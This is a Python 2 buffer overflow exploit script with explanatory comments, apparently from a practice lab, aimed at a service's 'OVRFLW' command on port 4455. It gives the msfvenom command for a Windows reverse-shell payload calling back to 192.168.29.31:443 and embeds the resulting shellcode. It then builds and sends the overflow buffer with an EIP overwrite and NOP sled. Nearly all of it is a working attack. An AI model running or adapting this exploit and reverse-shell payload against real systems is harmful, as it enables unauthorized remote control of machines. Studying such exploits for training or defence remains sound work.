#On the debugging machine, the application can be crashed on port
#4455 and EIP overwritten. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb is used to
#create a unique pattern, and /usr/share/metasploit-framework/tools/exploit/pattern_locate.rb to figure
#out the EIP offset. Bad characters were checked by putting all 256 characters after the offset in the
#buffer, and then seeing which ones didn't show up. The 256 characters appeared in the stack. For this application
#04, a4, ef, and ba were not showing up properly in the stack. !mona modules is used to find a
#suitable .dll that wasn't affected by any memory protection schemes. The !mona find -s
#"\xff\xe4" -m dll command is used to find a suitable JMP ESP address to put in EIP. Plenty of space
#was found past the offset in the buffer, so a NOP sled was inserted followed by shellcode.
#Generate shellcode with:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.29.31 LPORT=443 -f c -b "\x00\x04\x0a\x0d\xa4\xba\xef"
#Full exploit code
#!/usr/bin/python
# Python 2 script: the `print` statement below and the str-as-bytes concatenation
# used to build `buffer` both depend on Python 2 semantics.
import sys, socket
# Usage guard: the single argument is the target host; the port is hard-coded
# further down. NOTE(review): the two lines under this `if` appear unindented
# in this listing, presumably lost in rendering; as shown they would not parse.
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Opaque payload bytes produced by the msfvenom command quoted in the header
# comment (windows/shell_reverse_tcp). The LHOST/LPORT given at generation time
# are baked into these bytes, so the call-back address is fixed, not taken from
# argv. Each line holds 15 bytes except the last (3), 348 bytes in total.
shellcode = ("\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xa0\x9b\x2c\xae\x83\xee\xfc\xe2\xf4\x5c\x73\xae\xae\xa0\x9b"
"\x4c\x27\x45\xaa\xec\xca\x2b\xcb\x1c\x25\xf2\x97\xa7\xfc\xb4"
"\x10\x5e\x86\xaf\x2c\x66\x88\x91\x64\x80\x92\xc1\xe7\x2e\x82"
"\x80\x5a\xe3\xa3\xa1\x5c\xce\x5c\xf2\xcc\xa7\xfc\xb0\x10\x66"
"\x92\x2b\xd7\x3d\xd6\x43\xd3\x2d\x7f\xf1\x10\x75\x8e\xa1\x48"
"\xa7\xe7\xb8\x78\x16\xe7\x2b\xaf\xa7\xaf\x76\xaa\xd3\x02\x61"
"\x54\x21\xaf\x67\xa3\xcc\xdb\x56\x98\x51\x56\x9b\xe6\x08\xdb"
"\x44\xc3\xa7\xf6\x84\x9a\xff\xc8\x2b\x97\x67\x25\xf8\x87\x2d"
"\x7d\x2b\x9f\xa7\xaf\x70\x12\x68\x8a\x84\xc0\x77\xcf\xf9\xc1"
"\x7d\x51\x40\xc4\x73\xf4\x2b\x89\xc7\x23\xfd\xf3\x1f\x9c\xa0"
"\x9b\x44\xd9\xd3\xa9\x73\xfa\xc8\xd7\x5b\x88\xa7\x64\xf9\x16"
"\x30\x9a\x2c\xae\x89\x5f\x78\xfe\xc8\xb2\xac\xc5\xa0\x64\xf9"
"\xfe\xf0\xcb\x7c\xee\xf0\xdb\x7c\xc6\x4a\x94\xf3\x4e\x5f\x4e"
"\xbb\xc4\xa5\xf3\xec\x06\xbd\x84\x44\xac\xa0\x9a\x97\x27\x46"
"\xf1\x3c\xf8\xf7\xf3\xb5\x0b\xd4\xfa\xd3\x7b\x25\x5b\x58\xa2"
"\x5f\xd5\x24\xdb\x4c\xf3\xdc\x1b\x02\xcd\xd3\x7b\xc8\xf8\x41"
"\xca\xa0\x12\xcf\xf9\xf7\xcc\x1d\x58\xca\x89\x75\xf8\x42\x66"
"\x4a\x69\xe4\xbf\x10\xaf\xa1\x16\x68\x8a\xb0\x5d\x2c\xea\xf4"
"\xcb\x7a\xf8\xf6\xdd\x7a\xe0\xf6\xcd\x7f\xf8\xc8\xe2\xe0\x91"
"\x26\x64\xf9\x27\x40\xd5\x7a\xe8\x5f\xab\x44\xa6\x27\x86\x4c"
"\x51\x75\x20\xdc\x1b\x02\xcd\x44\x08\x35\x26\xb1\x51\x75\xa7"
"\x2a\xd2\xaa\x1b\xd7\x4e\xd5\x9e\x97\xe9\xb3\xe9\x43\xc4\xa0"
"\xc8\xd3\x7b")
# Command keyword (with trailing space) that the listening service reads before
# the oversized argument that follows it.
cmd = "OVRFLW "
# Buffer layout, matching the header comment: 773 filler bytes up to the EIP
# offset, then the 4-byte value written over EIP (presumably the JMP ESP address
# found with mona, in little-endian order -- not verifiable from this file),
# an 8-byte 0x90 NOP sled, the payload, and 1864 bytes of trailing padding.
junk = "A" * 773 + "\x83\x66\x96\x6a" + "\x90" * 8 + shellcode + "C" * 1864
# CRLF line terminator appended to the request.
end = "\r\n"
# Whole request: about 3 KB, dominated by long runs of 0x41 and 0x43 after the
# "OVRFLW " keyword. Detection note: that shape (a known command keyword followed
# by a multi-KB argument of repeated bytes) is an easy signature to alert on at
# the service or network layer.
buffer = cmd + junk + end
# Plain TCP connection to the host from argv[1] on the hard-coded port 4455
# (the port named in the header comment).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 4455))
# Single send of the request; up to 1024 bytes of any reply are read and
# discarded, then the socket is closed. No error handling around any step.
s.send(buffer)
s.recv(1024)
s.close()